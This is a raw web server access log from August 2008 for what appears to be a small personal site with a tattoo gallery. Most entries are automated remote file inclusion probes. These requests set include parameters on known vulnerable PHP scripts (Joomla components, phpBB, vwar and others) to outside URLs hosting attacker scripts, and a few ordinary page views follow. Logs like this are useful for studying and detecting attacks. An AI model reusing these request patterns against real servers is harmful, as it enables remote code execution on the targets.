212.234.12.71 - - [24/Aug/2008:07:50:32 -0500] "GET /logs/access_log.1214179200/htmltonuke.php?filnavn=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 325 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
212.234.12.71 - - [24/Aug/2008:07:50:37 -0500] "GET /logs/htmltonuke.php?filnavn=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 303 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
212.234.12.71 - - [24/Aug/2008:07:50:37 -0500] "GET /htmltonuke.php?filnavn=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 298 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
75.125.40.130 - - [24/Aug/2008:07:50:40 -0500] "GET //index.php?view=page&pagename=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
75.125.40.130 - - [24/Aug/2008:07:50:40 -0500] "GET /logs//index.php?view=page&pagename=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
212.234.12.71 - - [24/Aug/2008:07:50:46 -0500] "GET /logs/access_log.1214438400/htmltonuke.php?filnavn=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 325 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
82.192.68.61 - - [24/Aug/2008:07:51:46 -0500] "GET /logs/access_log.1214524800//vwar/admin/admin.php?vwar_root=http://peru.americautos.com/images/gha-id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
82.192.68.61 - - [24/Aug/2008:07:51:46 -0500] "GET //vwar/admin/admin.php?vwar_root=http://peru.americautos.com/images/gha-id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
82.192.68.61 - - [24/Aug/2008:07:51:46 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://peru.americautos.com/images/gha-id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
209.217.116.153 - - [24/Aug/2008:07:52:21 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:52:21 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:52:53 -0500] "GET /logs/access_log.1206230400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:52:53 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:52:54 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
91.93.128.125 - - [24/Aug/2008:07:54:32 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
91.93.128.125 - - [24/Aug/2008:07:54:33 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
67.212.173.42 - - [24/Aug/2008:07:54:47 -0500] "GET /logs/access_log.1206230400//claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:07:54:47 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:07:54:47 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
212.234.12.71 - - [24/Aug/2008:07:54:55 -0500] "GET /logs/access_log.1216252800/htmltonuke.php?filnavn=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 325 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
212.234.12.71 - - [24/Aug/2008:07:54:55 -0500] "GET /logs/access_log.1215129600/htmltonuke.php?filnavn=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 325 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
81.26.209.159 - - [24/Aug/2008:07:55:47 -0500] "GET /logs/access_log.1206230400//claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:07:55:47 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:07:55:48 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
91.93.128.125 - - [24/Aug/2008:07:56:21 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
91.93.128.125 - - [24/Aug/2008:07:56:21 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
209.217.116.153 - - [24/Aug/2008:07:56:35 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:56:35 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.132.197.33 - - [24/Aug/2008:07:56:44 -0500] "GET /logs/access_log.1213488000/_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://javva.com/id.txt? HTTP/1.1" 404 441 "-""libwww-perl/5.805"
213.132.197.33 - - [24/Aug/2008:07:56:44 -0500] "GET /_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://javva.com/id.txt? HTTP/1.1" 404 414 "-""libwww-perl/5.805"
213.132.197.33 - - [24/Aug/2008:07:56:44 -0500] "GET /logs/_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://javva.com/id.txt? HTTP/1.1" 404 419 "-""libwww-perl/5.805"
91.93.128.125 - - [24/Aug/2008:07:57:28 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
91.93.128.125 - - [24/Aug/2008:07:57:28 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
87.106.212.108 - - [24/Aug/2008:07:57:50 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.106.212.108 - - [24/Aug/2008:07:57:50 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.106.212.108 - - [24/Aug/2008:07:57:50 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
87.106.212.108 - - [24/Aug/2008:07:57:50 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
151.64.167.56 - - [24/Aug/2008:07:58:33 -0500] "GET /logs/access_log.1214524800//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:58:46 -0500] "GET /logs/access_log.1214524800//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
89.111.176.9 - - [24/Aug/2008:08:01:20 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.111.176.9 - - [24/Aug/2008:08:01:21 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
209.51.155.138 - - [24/Aug/2008:08:01:54 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
209.51.155.138 - - [24/Aug/2008:08:01:54 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
91.121.4.30 - - [24/Aug/2008:08:01:59 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.121.4.30 - - [24/Aug/2008:08:01:59 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.121.4.30 - - [24/Aug/2008:08:03:18 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.121.4.30 - - [24/Aug/2008:08:03:18 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
89.111.176.9 - - [24/Aug/2008:08:03:28 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.111.176.9 - - [24/Aug/2008:08:03:29 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
74.6.76.45 - - [24/Aug/2008:08:05:20 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.222.40.244 - - [24/Aug/2008:08:06:54 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.222.40.244 - - [24/Aug/2008:08:06:54 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
74.55.246.194 - - [24/Aug/2008:08:07:03 -0500] "GET /logs/access_log.1214524800//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:07:03 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:07:04 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.814"
193.239.188.99 - - [24/Aug/2008:08:07:19 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://newproductionweb.altervista.org/contrm.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.239.188.99 - - [24/Aug/2008:08:07:19 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://newproductionweb.altervista.org/contrm.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.55.246.194 - - [24/Aug/2008:08:07:26 -0500] "GET /logs/access_log.1214524800//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:07:26 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:07:26 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.814"
84.21.71.133 - - [24/Aug/2008:08:07:46 -0500] "GET /logs/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
84.21.71.133 - - [24/Aug/2008:08:07:46 -0500] "GET /admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
89.111.176.9 - - [24/Aug/2008:08:08:02 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.111.176.9 - - [24/Aug/2008:08:08:02 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:08:08:42 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:08:08:43 -0500] "GET /lostpasswd.php?env[include_prefix]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.34.171.29 - - [24/Aug/2008:08:09:59 -0500] "GET /logs//main.php?sayfa=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
64.34.171.29 - - [24/Aug/2008:08:10:00 -0500] "GET //main.php?sayfa=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:08:10:50 -0500] "GET /logs/access_log.1214438400//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:08:10:55 -0500] "GET /logs/access_log.1214438400//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
69.64.34.172 - - [24/Aug/2008:08:12:25 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
69.64.34.172 - - [24/Aug/2008:08:12:25 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
216.139.67.90 - - [24/Aug/2008:08:14:36 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
216.139.67.90 - - [24/Aug/2008:08:14:36 -0500] "GET //skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
216.139.67.90 - - [24/Aug/2008:08:14:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
81.169.169.102 - - [24/Aug/2008:08:14:44 -0500] "GET //?path%5Bdocroot%5D=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
81.169.169.102 - - [24/Aug/2008:08:14:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 200 96475 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
216.139.67.90 - - [24/Aug/2008:08:15:29 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
193.239.188.99 - - [24/Aug/2008:08:16:14 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://newproductionweb.altervista.org/contrm.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.239.188.99 - - [24/Aug/2008:08:16:16 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://newproductionweb.altervista.org/contrm.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
82.192.68.61 - - [24/Aug/2008:08:16:50 -0500] "GET /logs/access_log.1214179200//vwar/admin/admin.php?vwar_root=http://peru.americautos.com/images/gha-id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.94.70.15 - - [24/Aug/2008:08:16:55 -0500] "GET //modules/xfsection/modify.php?dir_module=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
69.94.70.15 - - [24/Aug/2008:08:16:55 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
62.65.159.210 - - [24/Aug/2008:08:16:57 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Aug/2008:08:16:59 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
216.139.67.90 - - [24/Aug/2008:08:17:36 -0500] "GET //skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
64.22.89.194 - - [24/Aug/2008:08:18:19 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
82.194.76.177 - - [24/Aug/2008:08:18:19 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
82.194.76.177 - - [24/Aug/2008:08:18:19 -0500] "GET //skin/zero_vote/error.php?dir=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
82.194.76.177 - - [24/Aug/2008:08:18:20 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:19:07 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:19:07 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:19:07 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
77.222.40.229 - - [24/Aug/2008:08:19:24 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 338 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.222.40.229 - - [24/Aug/2008:08:19:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
64.22.89.194 - - [24/Aug/2008:08:19:41 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:19:41 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:19:42 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:19:42 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
216.139.67.90 - - [24/Aug/2008:08:19:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
216.139.67.90 - - [24/Aug/2008:08:19:57 -0500] "GET //skin/zero_vote/error.php?dir=http://www.carnac.info/coprald/ide.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
67.19.90.90 - - [24/Aug/2008:08:20:20 -0500] "GET /logs/access_log.1213488000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
77.221.130.3 - - [24/Aug/2008:08:21:07 -0500] "GET /logs/access_log.1203120000//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:21:08 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:21:09 -0500] "GET /logs/access_log.1208044800//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:21:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:21:09 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:21:10 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
212.219.59.222 - - [24/Aug/2008:08:21:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://www.google.com/search?q=vintage+tattoo&rls=com.microsoft:en-gb:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7GGLR""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:33 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:34 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:40 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:41 -0500] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:41 -0500] "GET /tattoo/tatc8.JPG HTTP/1.0" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:41 -0500] "GET /tattoo/tatc6.JPG HTTP/1.0" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:41 -0500] "GET /tattoo/tatc4.JPG HTTP/1.0" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:42 -0500] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:42 -0500] "GET /tattoo/tatc5.JPG HTTP/1.0" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
